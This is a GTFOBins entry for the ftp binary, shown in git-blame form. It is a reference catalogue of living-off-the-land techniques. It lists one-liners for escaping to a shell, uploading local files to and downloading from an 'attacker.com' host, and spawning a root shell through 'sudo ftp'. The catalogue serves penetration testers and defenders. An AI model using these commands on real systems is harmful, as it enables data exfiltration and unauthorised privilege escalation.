GTFOBins.github.io/_gtfobins/ftp.md

24 lines
438 B
Markdown
Raw Normal View History

2018-05-21 19:14:41 +00:00
---
functions:
2018-10-05 17:55:38 +00:00
shell:
2018-07-16 13:01:50 +00:00
- code: |
ftp
!/bin/sh
2018-10-05 17:55:38 +00:00
file-upload:
2018-07-16 13:01:50 +00:00
- description: Send local file to a FTP server.
code: |
RHOST=attacker.com
ftp $RHOST
put file_to_send
2018-10-05 17:55:38 +00:00
file-download:
2018-07-16 13:01:50 +00:00
- description: Fetch a remote file from a FTP server.
code: |
RHOST=attacker.com
ftp $RHOST
get file_to_get
2018-10-05 17:55:38 +00:00
sudo:
2018-07-16 13:01:50 +00:00
- code: |
sudo ftp
!/bin/sh
2018-05-24 23:10:39 +00:00
---